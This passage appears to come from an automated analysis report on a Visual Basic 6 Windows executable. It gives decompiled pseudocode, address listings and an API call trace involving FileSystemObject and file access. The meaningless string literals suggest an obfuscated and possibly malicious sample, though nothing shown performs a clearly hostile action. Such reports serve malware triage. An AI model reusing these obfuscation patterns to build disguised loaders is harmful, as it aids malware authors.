				_push( &_v112);
				_t1211 =  &_v96;
				_push(_t1211);
				L004014F2();
				_v244 = _t1211;
				if(_v244 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(_v244);
					L004014EC();
					_v476 = _t1211;
				}
				_t1212 =  &_v112;
				L004014E6();
				_v220 = _t1212;
				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v212,  &_v220, _t1212);
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L004014DA();
				_push( &_v112);
				_push( &_v96);
				_push(2);
				L00401576();
				if( *0x42a010 != 0) {
					_v480 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v480 = 0x42a010;
				}
				_t1224 =  &_v68;
				L00401564();
				_v228 = _t1224;
				_t1228 =  *((intOrPtr*)( *_v228 + 0x48))(_v228,  &_v56, _t1224,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x300))( *_v480));
				asm("fclex");
				_v232 = _t1228;
				if(_v232 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40fafc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v484 = _t1228;
				}
				_v284 = _v56;
				_v56 = _v56 & 0x00000000;
				_v88 = _v284;
				_v96 = 8;
				_t1232 =  &_v112;
				L004014BC();
				L004014B6();
				_v216 = _t1232;
				_v212 = _v216;
				L00401570();
				L00401588();
				_v196 = 0x6366;
				_t1241 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v196,  &_v60, 0x602ccf,  &_v212, 0x4ac938,  &_v200,  &_v112, 0x16, 0xc0, 0xeb, _t1232,  &_v96);
				_v236 = _t1241;
				if(_v236 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v236);
					L00401558();
					_v488 = _t1241;
				}
				 *((short*)(_a4 + 0x44)) = _v200;
				L00401516();
				L00401552();
				_push( &_v112);
				_push( &_v96);
				_push(2);
				L00401576();
				if( *0x42a010 != 0) {
					_v492 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v492 = 0x42a010;
				}
				_t1248 =  &_v68;
				L00401564();
				_v228 = _t1248;
				_t1252 =  *((intOrPtr*)( *_v228 + 0xe0))(_v228,  &_v196, _t1248,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x308))( *_v492));
				asm("fclex");
				_v232 = _t1252;
				if(_v232 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40fafc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v496 = _t1252;
				}
				_push(L"AUDIOFONENALG");
				L004014CE();
				_v204 = _t1252;
				_push(L"flothedernestipuloi");
				L004014CE();
				_v208 = _t1252;
				_t1567 =  *0x4011b8;
				if( *0x42a000 != 0) {
					_push( *0x4011bc);
					_push( *0x4011b8);
					L00401354();
				} else {
					_t1567 = _t1567 /  *0x4011b8;
				}
				if( *0x42a000 != 0) {
					_push( *0x4011bc);
					_push( *0x4011b8);
					L00401354();
				} else {
					_t1567 = _t1567 /  *0x4011b8;
				}
				_v88 = _t1567;
				asm("fnstsw ax");
				if((_t1252 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v96 = 5;
				_t1254 =  &_v96;
				L004014AA();
				L00401588();
				L004014B0();
				L00401588();
				_v104 = 0x80020004;
				_v112 = 0xa;
				_v288 = _v64;
				_v64 = _v64 & 0x00000000;
				_v200 = _v204;
				_t1257 =  &_v112;
				L004014F8();
				L00401588();
				L004014A4();
				 *((intOrPtr*)( *_a4 + 0x738))(_a4, 0x35a2db, _v196,  &_v200, _v208, _t1257, _t1257, 0x1d9c15, _t1257, _t1257, _t1254, _t1254, 0);
				_push( &_v64);
				_push( &_v60);
				_push( &_v56);
				_push(3);
				L004014E0();
				L00401552();
				_push( &_v112);
				_push( &_v96);
				_push(2);
				L00401576();
				if( *0x42a010 != 0) {
					_v500 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v500 = 0x42a010;
				}
				_t1270 =  &_v68;
				L00401564();
				_v228 = _t1270;
				_t1274 =  *((intOrPtr*)( *_v228 + 0x60))(_v228,  &_v212, _t1270,  *((intOrPtr*)( *((intOrPtr*)( *_v500)) + 0x360))( *_v500));
				asm("fclex");
				_v232 = _t1274;
				if(_v232 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40faec);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v504 = _t1274;
				}
				_push(0xa6);
				L0040149E();
				L00401588();
				if( *0x42a010 != 0) {
					_v508 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v508 = 0x42a010;
				}
				_t1278 =  &_v72;
				L00401564();
				_v236 = _t1278;
				_t1282 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v216, _t1278,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x314))( *_v508));
				asm("fclex");
				_v240 = _t1282;
				if(_v240 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40facc);
					_push(_v236);
					_push(_v240);
					L00401558();
					_v512 = _t1282;
				}
				if( *0x42a010 != 0) {
					_v516 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v516 = 0x42a010;
				}
				_t1286 =  &_v76;
				L00401564();
				_v244 = _t1286;
				_t1290 =  *((intOrPtr*)( *_v244 + 0x108))(_v244,  &_v80, _t1286,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x328))( *_v516));
				asm("fclex");
				_v248 = _t1290;
				if(_v248 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x40fb2c);
					_push(_v244);
					_push(_v248);
					L00401558();
					_v520 = _t1290;
				}
				L004014C8();
				_t1292 =  &_v96;
				L004014E6();
				_v224 = _t1292;
				L00401504();
				_v220 = 0x325045;
				_v292 = _v64;
				_v64 = _v64 & 0x00000000;
				_t820 =  &_v220; // 0x325045
				_t1296 = _t820;
				L00401588();
				L004014D4();
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v212, _t1296, _t1296, _t1296, _v216,  &_v60,  &_v224, L"Canvased", _t1292,  &_v96, _v80, 0, 0);
				_push( &_v64);
				_push( &_v60);
				_push( &_v56);
				_push(3);
				L004014E0();
				_push( &_v80);
				_push( &_v76);
				_push( &_v72);
				_push( &_v68);
				_push(4);
				L004014DA();
				L0040158E();
				_push(0xc8e);
				_push( &_v96);
				L00401498();
				if( *0x42a010 != 0) {
					_v524 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v524 = 0x42a010;
				}
				_t1311 =  &_v68;
				L00401564();
				_v228 = _t1311;
				_t1315 =  *((intOrPtr*)( *_v228 + 0x198))(_v228,  &_v56, _t1311,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x310))( *_v524));
				asm("fclex");
				_v232 = _t1315;
				if(_v232 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x40f9cc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v528 = _t1315;
				}
				if( *0x42a010 != 0) {
					_v532 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v532 = 0x42a010;
				}
				_t1319 =  &_v72;
				L00401564();
				_v236 = _t1319;
				_t1323 =  *((intOrPtr*)( *_v236 + 0xa0))(_v236,  &_v196, _t1319,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x340))( *_v532));
				asm("fclex");
				_v240 = _t1323;
				if(_v240 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40fadc);
					_push(_v236);
					_push(_v240);
					L00401558();
					_v536 = _t1323;
				}
				_v104 = 0x845c7430;
				_v100 = 0x5afc;
				_v112 = 6;
				_t1324 =  &_v112;
				L00401492();
				L00401588();
				L004014D4();
				_v212 = _t1324;
				_v200 = 0x75b3;
				L00401570();
				L00401588();
				_t1332 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v60,  &_v200, L"FONDETSEVENTUALIZESDYNA",  &_v212, _v196,  &_v64,  &_v96, _v56, _t1324, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe);
				_v244 = _t1332;
				if(_v244 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v244);
					L00401558();
					_v540 = _t1332;
				}
				_push( &_v64);
				_push( &_v60);
				_push( &_v56);
				_push(3);
				L004014E0();
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L004014DA();
				_push( &_v96);
				_push( &_v112);
				_push(2);
				L00401576();
				if( *0x42a010 != 0) {
					_v544 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v544 = 0x42a010;
				}
				_t1343 =  &_v68;
				L00401564();
				_v228 = _t1343;
				_t1347 =  *((intOrPtr*)( *_v228 + 0x1b8))(_v228,  &_v72, _t1343,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x33c))( *_v544));
				asm("fclex");
				_v232 = _t1347;
				if(_v232 >= 0) {
					_v548 = _v548 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x40f9cc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v548 = _t1347;
				}
				L004014C8();
				L00401570();
				L00401588();
				L00401504();
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v56,  &_v60, 0x63aa0d,  &_v64,  &_v96,  &_v96, _v72, 0, 0);
				L00401504();
				L004014E0();
				L004014DA();
				L0040158E();
				_t1363 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, 2,  &_v68,  &_v72, 3,  &_v56,  &_v60,  &_v64);
				_v228 = _t1363;
				if(_v228 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v228);
					L00401558();
					_v552 = _t1363;
				}
				_v8 = 0;
				asm("wait");
				_push(0x426310);
				L00401516();
				L00401516();
				L00401552();
				L00401516();
				return _t1363;
			}

0x00424317
0x00424326
0x00424332
0x0042433a
0x0042433d
0x0042434a
0x00424353
0x0042435e
0x00424364
0x00424365
0x0042436a
0x0042436d
0x0042436e
0x0042437e
0x00424388
0x00424396
0x004243a2
0x004243a5
0x004243ac
0x004243ae
0x004243b1
0x004243b2
0x004243b5
0x004243b6
0x004243bb
0x004243bd
0x004243bf
0x004243c1
0x004243c3
0x004243c6
0x004243c7
0x004243d1
0x004243d6
0x004243d9
0x004243da
0x004243dd
0x004243de
0x004243e0
0x004243e5
0x004243ef
0x0042440c
0x004243f1
0x004243f1
0x004243f6
0x004243fb
0x00424400
0x00424400
0x0042441c
0x00424429
0x00424430
0x00424434
0x00424439
0x0042443f
0x00424449
0x00424451
0x00424457
0x00424459
0x00424466
0x0042448b
0x00424468
0x00424468
0x0042446d
0x00424472
0x00424478
0x0042447e
0x00424483
0x00424483
0x00424492
0x00424495
0x0042449b
0x0042449f
0x004244a5
0x004244a8
0x004244af
0x004244b2
0x004244b3
0x004244b6
0x004244b7
0x004244bc
0x004244bf
0x004244c0
0x004244ca
0x004244d2
0x004244d7
0x004244da
0x004244db
0x004244de
0x004244df
0x004244e1
0x004244e6
0x004244e6
0x004244e9
0x004244eb
0x004244f3
0x004244f4
0x004244f9
0x004244fc
0x004244fd
0x00424502
0x00424506
0x00424507
0x0042450f
0x00424514
0x0042451e
0x00424528
0x0042452f
0x00424539
0x0042453c
0x00424549
0x0042454a
0x0042454b
0x0042454c
0x0042454d
0x0042454f
0x00424554
0x00424557
0x0042455a
0x0042455b
0x00424560
0x00424563
0x00424564
0x0042456a
0x0042456b
0x00424570
0x0042457a
0x00424588
0x0042458e
0x00424598
0x004245ab
0x004245b3
0x004245b7
0x004245b8
0x004245bd
0x004245c7
0x004245d4
0x004245db
0x004245dc
0x004245df
0x004245e0
0x004245e5
0x004245e6
0x004245f0
0x004245f5
0x004245f6
0x004245f8
0x004245fa
0x004245ff
0x00424607
0x0042460f
0x00424613
0x00424617
0x00424618
0x0042461a
0x0042461f
0x00424622
0x0042462a
0x0042462b
0x0042462d
0x00424632
0x00424634
0x00424639
0x0042463e
0x00424643
0x0042464d
0x0042465a
0x00424662
0x00424662
0x00424667
0x0042466e
0x00424675
0x00424678
0x00424679
0x0042467e
0x0042468c
0x004246a9
0x0042468e
0x0042468e
0x00424693
0x00424698
0x0042469d
0x0042469d
0x004246c3
0x004246cd
0x004246d1
0x004246d6
0x004246dc
0x004246e6
0x004246f0
0x004246fa
0x00424704
0x0042470e
0x0042471b
0x00424728
0x00424729
0x0042472a
0x0042472b
0x0042472f
0x0042473c
0x0042473d
0x0042473e
0x0042473f
0x00424743
0x00424750
0x00424751
0x00424752
0x00424753
0x0042475b
0x00424761
0x00424767
0x00424774
0x00424785
0x0042478b
0x0042478d
0x0042479a
0x004247bf
0x0042479c
0x0042479c
0x004247a1
0x004247a6
0x004247ac
0x004247b2
0x004247b7
0x004247b7
0x004247c9
0x004247d1
0x004247dd
0x004247fa
0x004247df
0x004247df
0x004247e4
0x004247e9
0x004247ee
0x004247ee
0x0042481e
0x00424822
0x00424827
0x0042483f
0x00424845
0x00424847
0x00424854
0x00424879
0x00424856
0x00424856
0x0042485b
0x00424860
0x00424866
0x0042486c
0x00424871
0x00424871
0x00424880
0x00424887
0x0042488e
0x00424891
0x00424892
0x00424897
0x004248a5
0x004248c2
0x004248a7
0x004248a7
0x004248ac
0x004248b1
0x004248b6
0x004248b6
0x004248e6
0x004248ea
0x004248ef
0x0042490a
0x0042490d
0x0042490f
0x0042491c
0x0042493e
0x0042491e
0x0042491e
0x00424920
0x00424925
0x0042492b
0x00424931
0x00424936
0x00424936
0x0042494b
0x0042494e
0x00424958
0x00424959
0x0042495c
0x0042495d
0x00424962
0x0042496f
0x00424984
0x00424971
0x00424971
0x00424977
0x0042497c
0x0042497c
0x00424992
0x004249af
0x00424994
0x00424994
0x00424999
0x0042499e
0x004249a3
0x004249a3
0x004249d3
0x004249d7
0x004249dc
0x004249f4
0x004249fa
0x004249fc
0x00424a09
0x00424a2e
0x00424a0b
0x00424a0b
0x00424a10
0x00424a15
0x00424a1b
0x00424a21
0x00424a26
0x00424a26
0x00424a35
0x00424a42
0x00424a48
0x00424a55
0x00424a61
0x00424a78
0x00424a7c
0x00424a99
0x00424a9f
0x00424aac
0x00424ace
0x00424aae
0x00424aae
0x00424ab3
0x00424ab8
0x00424abb
0x00424ac1
0x00424ac6
0x00424ac6
0x00424ad8
0x00424adc
0x00424add
0x00424adf
0x00424aea
0x00424aee
0x00424af2
0x00424af3
0x00424af5
0x00424b00
0x00424b04
0x00424b08
0x00424b09
0x00424b0b
0x00424b1a
0x00424b37
0x00424b1c
0x00424b1c
0x00424b21
0x00424b26
0x00424b2b
0x00424b2b
0x00424b5b
0x00424b5f
0x00424b64
0x00424b7c
0x00424b82
0x00424b84
0x00424b91
0x00424bb6
0x00424b93
0x00424b93
0x00424b98
0x00424b9d
0x00424ba3
0x00424ba9
0x00424bae
0x00424bae
0x00424bc4
0x00424be1
0x00424bc6
0x00424bc6
0x00424bcb
0x00424bd0
0x00424bd5
0x00424bd5
0x00424c05
0x00424c09
0x00424c0e
0x00424c29
0x00424c2f
0x00424c31
0x00424c3e
0x00424c63
0x00424c40
0x00424c40
0x00424c45
0x00424c4a
0x00424c50
0x00424c56
0x00424c5b
0x00424c5b
0x00424c70
0x00424c73
0x00424c7d
0x00424c7e
0x00424c81
0x00424c82
0x00424c87
0x00424c94
0x00424ca9
0x00424c96
0x00424c96
0x00424c9c
0x00424ca1
0x00424ca1
0x00424cb0
0x00424cc1
0x00424cc5
0x00424ce3
0x00424ce9
0x00424cf6
0x00424d18
0x00424cf8
0x00424cf8
0x00424cfd
0x00424d02
0x00424d05
0x00424d0b
0x00424d10
0x00424d10
0x00424d26
0x00424d2d
0x00424d35
0x00424d39
0x00424d3a
0x00424d3c
0x00424d47
0x00424d4b
0x00424d4c
0x00424d4e
0x00424d5d
0x00424d7a
0x00424d5f
0x00424d5f
0x00424d64
0x00424d69
0x00424d6e
0x00424d6e
0x00424d9e
0x00424da2
0x00424da7
0x00424dc2
0x00424dc5
0x00424dc7
0x00424dd4
0x00424df6
0x00424dd6
0x00424dd6
0x00424dd8
0x00424ddd
0x00424de3
0x00424de9
0x00424dee
0x00424dee
0x00424dfd
0x00424e22
0x00424e31
0x00424e37
0x00424e44
0x00424e59
0x00424e5f
0x00424e6c
0x00424e8e
0x00424e6e
0x00424e6e
0x00424e73
0x00424e78
0x00424e7b
0x00424e81
0x00424e86
0x00424e86
0x00424e9c
0x00424ea7
0x00424ec4
0x00424ea9
0x00424ea9
0x00424eae
0x00424eb3
0x00424eb8
0x00424eb8
0x00424ee8
0x00424eec
0x00424ef1
0x00424f09
0x00424f0c
0x00424f0e
0x00424f1b
0x00424f3d
0x00424f1d
0x00424f1d
0x00424f1f
0x00424f24
0x00424f2a
0x00424f30
0x00424f35
0x00424f35
0x00424f44
0x00424f57
0x00424f61
0x00424f6f
0x00424f75
0x00424f82
0x00424fa4
0x00424f84
0x00424f84
0x00424f89
0x00424f8e
0x00424f91
0x00424f97
0x00424f9c
0x00424f9c
0x00424fae
0x00424fb4
0x00424fc1
0x00424fc9
0x00424fd1
0x00424fdd
0x00424ffa
0x00424fdf
0x00424fdf
0x00424fe4
0x00424fe9
0x00424fee
0x00424fee
0x0042501e
0x00425022
0x00425027
0x00425042
0x00425045
0x00425047
0x00425054
0x00425076
0x00425056
0x00425056
0x00425058
0x0042505d
0x00425063
0x00425069
0x0042506e
0x0042506e
0x00425083
0x00425086
0x00425090
0x00425091
0x00425094
0x00425095
0x0042509a
0x004250a7
0x004250bc
0x004250a9
0x004250a9
0x004250af
0x004250b4
0x004250b4
0x004250c3
0x004250ca
0x004250d1
0x004250d4
0x004250d5
0x004250da
0x004250e8
0x00425105
0x004250ea
0x004250ea
0x004250ef
0x004250f4
0x004250f9
0x004250f9
0x00425129
0x0042512d
0x00425132
0x0042514d
0x00425153
0x00425155
0x00425162
0x00425187
0x00425164
0x00425164
0x00425169
0x0042516e
0x00425174
0x0042517a
0x0042517f
0x0042517f
0x00425195
0x004251b2
0x00425197
0x00425197
0x0042519c
0x004251a1
0x004251a6
0x004251a6
0x004251d6
0x004251da
0x004251df
0x004251fa
0x00425200
0x00425202
0x0042520f
0x00425234
0x00425211
0x00425211
0x00425216
0x0042521b
0x00425221
0x00425227
0x0042522c
0x0042522c
0x00425242
0x00425261
0x00425265
0x00425273
0x00425279
0x00425286
0x004252a8
0x00425288
0x00425288
0x0042528d
0x00425292
0x00425295
0x0042529b
0x004252a0
0x004252a0
0x004252bd
0x004252d3
0x004252e3
0x004252e9
0x004252ee
0x004252f3
0x00425301
0x0042531e
0x00425303
0x00425303
0x00425308
0x0042530d
0x00425312
0x00425312
0x00425342
0x00425346
0x0042534b
0x00425363
0x00425369
0x0042536b
0x00425378
0x0042539d
0x0042537a
0x0042537a
0x0042537f
0x00425384
0x0042538a
0x00425390
0x00425395
0x00425395
0x004253af
0x004253c3
0x004253c7
0x004253d1
0x004253e5
0x004253f5
0x004253fc
0x00425404
0x00425408
0x00425409
0x0042540b
0x00425416
0x00425422
0x0042543f
0x00425424
0x00425424
0x00425429
0x0042542e
0x00425433
0x00425433
0x00425463
0x00425467
0x0042546c
0x00425484
0x00425487
0x00425489
0x00425496
0x004254b8
0x00425498
0x00425498
0x0042549a
0x0042549f
0x004254a5
0x004254ab
0x004254b0
0x004254b0
0x004254c2
0x004254c8
0x004254d2
0x004254d5
0x004254df
0x004254e3
0x004254e4
0x004254f0
0x0042550d
0x004254f2
0x004254f2
0x004254f7
0x004254fc
0x00425501
0x00425501
0x00425531
0x00425535
0x0042553a
0x00425552
0x00425558
0x0042555a
0x00425567
0x0042558c
0x00425569
0x00425569
0x0042556e
0x00425573
0x00425579
0x0042557f
0x00425584
0x00425584
0x00425593
0x004255a0
0x004255aa
0x004255cc
0x004255d2
0x004255df
0x00425601
0x004255e1
0x004255e1
0x004255e6
0x004255eb
0x004255ee
0x004255f4
0x004255f9
0x004255f9
0x0042560f
0x0042561d
0x0042562f
0x00425641
0x00425658
0x00425668
0x00425673
0x00425690
0x00425675
0x00425675
0x0042567a
0x0042567f
0x00425684
0x00425684
0x004256b4
0x004256b8
0x004256bd
0x004256d8
0x004256db
0x004256dd
0x004256ea
0x0042570c
0x004256ec
0x004256ec
0x004256ee
0x004256f3
0x004256f9
0x004256ff
0x00425704
0x00425704
0x0042571a
0x00425737
0x0042571c
0x0042571c
0x00425721
0x00425726
0x0042572b
0x0042572b
0x0042575b
0x0042575f
0x00425764
0x0042577f
0x00425782
0x00425784
0x00425791
0x004257b3
0x00425793
0x00425793
0x00425795
0x0042579a
0x004257a0
0x004257a6
0x004257ab
0x004257ab
0x004257c0
0x004257c3
0x004257cd
0x004257ce
0x004257d1
0x004257d2
0x004257d7
0x004257e4
0x004257f9
0x004257e6
0x004257e6
0x004257ec
0x004257f1
0x004257f1
0x00425800
0x00425804
0x00425809
0x00425824
0x0042582d
0x00425831
0x00425832
0x00425834
0x0042583f
0x00425843
0x00425844
0x00425846
0x00425855
0x00425872
0x00425857
0x00425857
0x0042585c
0x00425861
0x00425866
0x00425866
0x00425896
0x0042589a
0x0042589f
0x004258b7
0x004258ba
0x004258bc
0x004258c9
0x004258eb
0x004258cb
0x004258cb
0x004258cd
0x004258d2
0x004258d8
0x004258de
0x004258e3
0x004258e3
0x004258f5
0x004258fb
0x00425905
0x00425908
0x00425913
0x00425917
0x00425928
0x0042592d
0x00425939
0x00425943
0x0042594d
0x00425952
0x00425986
0x0042598c
0x00425999
0x004259bb
0x0042599b
0x0042599b
0x004259a0
0x004259a5
0x004259a8
0x004259ae
0x004259b3
0x004259b3
0x004259cc
0x004259d3
0x004259db
0x004259e3
0x004259e7
0x004259e8
0x004259ea
0x004259f9
0x00425a16
0x004259fb
0x004259fb
0x00425a00
0x00425a05
0x00425a0a
0x00425a0a
0x00425a3a
0x00425a3e
0x00425a43
0x00425a5e
0x00425a64
0x00425a66
0x00425a73
0x00425a98
0x00425a75
0x00425a75
0x00425a7a
0x00425a7f
0x00425a85
0x00425a8b
0x00425a90
0x00425a90
0x00425a9f
0x00425aa4
0x00425aa9
0x00425ab0
0x00425ab5
0x00425aba
0x00425ac1
0x00425ace
0x00425ad8
0x00425ade
0x00425ae4
0x00425ad0
0x00425ad0
0x00425ad0
0x00425af0
0x00425afa
0x00425b00
0x00425b06
0x00425af2
0x00425af2
0x00425af2
0x00425b0b
0x00425b0e
0x00425b12
0x0040133c
0x0040133c
0x00425b18
0x00425b21
0x00425b25
0x00425b2f
0x00425b35
0x00425b3f
0x00425b44
0x00425b4b
0x00425b55
0x00425b5b
0x00425b66
0x00425b6d
0x00425b71
0x00425b85
0x00425b8b
0x00425bb1
0x00425bba
0x00425bbe
0x00425bc2
0x00425bc3
0x00425bc5
0x00425bd0
0x00425bd8
0x00425bdc
0x00425bdd
0x00425bdf
0x00425bee
0x00425c0b
0x00425bf0
0x00425bf0
0x00425bf5
0x00425bfa
0x00425bff
0x00425bff
0x00425c2f
0x00425c33
0x00425c38
0x00425c53
0x00425c56
0x00425c58
0x00425c65
0x00425c87
0x00425c67
0x00425c67
0x00425c69
0x00425c6e
0x00425c74
0x00425c7a
0x00425c7f
0x00425c7f
0x00425c8e
0x00425c93
0x00425c9d
0x00425ca9
0x00425cc6
0x00425cab
0x00425cab
0x00425cb0
0x00425cb5
0x00425cba
0x00425cba
0x00425cea
0x00425cee
0x00425cf3
0x00425d0e
0x00425d14
0x00425d16
0x00425d23
0x00425d48
0x00425d25
0x00425d25
0x00425d2a
0x00425d2f
0x00425d35
0x00425d3b
0x00425d40
0x00425d40
0x00425d56
0x00425d73
0x00425d58
0x00425d58
0x00425d5d
0x00425d62
0x00425d67
0x00425d67
0x00425d97
0x00425d9b
0x00425da0
0x00425db8
0x00425dbe
0x00425dc0
0x00425dcd
0x00425df2
0x00425dcf
0x00425dcf
0x00425dd4
0x00425dd9
0x00425ddf
0x00425de5
0x00425dea
0x00425dea
0x00425e04
0x00425e0c
0x00425e10
0x00425e15
0x00425e23
0x00425e28
0x00425e35
0x00425e3b
0x00425e55
0x00425e55
0x00425e65
0x00425e6b
0x00425e7f
0x00425e88
0x00425e8c
0x00425e90
0x00425e91
0x00425e93
0x00425e9e
0x00425ea2
0x00425ea6
0x00425eaa
0x00425eab
0x00425ead
0x00425eb8
0x00425ebd
0x00425ec5
0x00425ec6
0x00425ed2
0x00425eef
0x00425ed4
0x00425ed4
0x00425ed9
0x00425ede
0x00425ee3
0x00425ee3
0x00425f13
0x00425f17
0x00425f1c
0x00425f34
0x00425f3a
0x00425f3c
0x00425f49
0x00425f6e
0x00425f4b
0x00425f4b
0x00425f50
0x00425f55
0x00425f5b
0x00425f61
0x00425f66
0x00425f66
0x00425f7c
0x00425f99
0x00425f7e
0x00425f7e
0x00425f83
0x00425f88
0x00425f8d
0x00425f8d
0x00425fbd
0x00425fc1
0x00425fc6
0x00425fe1
0x00425fe7
0x00425fe9
0x00425ff6
0x0042601b
0x00425ff8
0x00425ff8
0x00425ffd
0x00426002
0x00426008
0x0042600e
0x00426013
0x00426013
0x00426022
0x00426029
0x00426030
0x0042603f
0x00426043
0x0042604d
0x00426055
0x0042605a
0x00426060
0x0042606d
0x00426077
0x004260a5
0x004260ab
0x004260b8
0x004260da
0x004260ba
0x004260ba
0x004260bf
0x004260c4
0x004260c7
0x004260cd
0x004260d2
0x004260d2
0x004260e4
0x004260e8
0x004260ec
0x004260ed
0x004260ef
0x004260fa
0x004260fe
0x004260ff
0x00426101
0x0042610c
0x00426110
0x00426111
0x00426113
0x00426122
0x0042613f
0x00426124
0x00426124
0x00426129
0x0042612e
0x00426133
0x00426133
0x00426163
0x00426167
0x0042616c
0x00426184
0x0042618a
0x0042618c
0x00426199
0x004261be
0x0042619b
0x0042619b
0x004261a0
0x004261a5
0x004261ab
0x004261b1
0x004261b6
0x004261b6
0x004261d0
0x004261dc
0x004261e6
0x004261f3
0x00426211
0x00426220
0x00426233
0x00426245
0x00426250
0x0042625d
0x00426263
0x00426270
0x00426292
0x00426272
0x00426272
0x00426277
0x0042627c
0x0042627f
0x00426285
0x0042628a
0x0042628a
0x00426299
0x004262a0
0x004262a1
0x004262f2
0x004262fa
0x00426302
0x0042630a
0x0042630f

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00424332
#610.MSVBVM60(?,?,?,?,?,00401336), ref: 00424365
#557.MSVBVM60(?,?,?,?,?,?,00401336), ref: 0042436E
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401336), ref: 00424388
#714.MSVBVM60(?,00000004,00000000), ref: 004243B6
#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,?,00000004,00000000), ref: 004243C7
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,?,00000004,00000000), ref: 004243D1
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,000000FF,000000FE,000000FE,000000FE,?,00000004,00000000), ref: 004243E0
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,00401336), ref: 004243FB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00424434
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,000000A0), ref: 0042447E
#518.MSVBVM60(?,00000008), ref: 004244B7
__vbaStrVarMove.MSVBVM60(?,?,00000008), ref: 004244C0
__vbaStrMove.MSVBVM60(?,?,00000008), ref: 004244CA
__vbaFreeObj.MSVBVM60(?,?,00000008), ref: 004244D2
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008), ref: 004244E1
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,?,?,00401336), ref: 004244F4
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,?,?,00401336), ref: 004244FD
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,?,?,00401336), ref: 00424507
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,?,?,00401336), ref: 0042450F
__vbaChkstk.MSVBVM60 ref: 0042453C
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0042455B
__vbaVarTstGe.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,00401336), ref: 0042456B
__vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,00401336), ref: 0042457A
__vbaVarDup.MSVBVM60 ref: 004245AB
#666.MSVBVM60(?,?), ref: 004245B8
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,?), ref: 004245E0
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,?), ref: 004245E6
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,?), ref: 004245F0
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 004245FF
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 00424607
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,?), ref: 0042461A
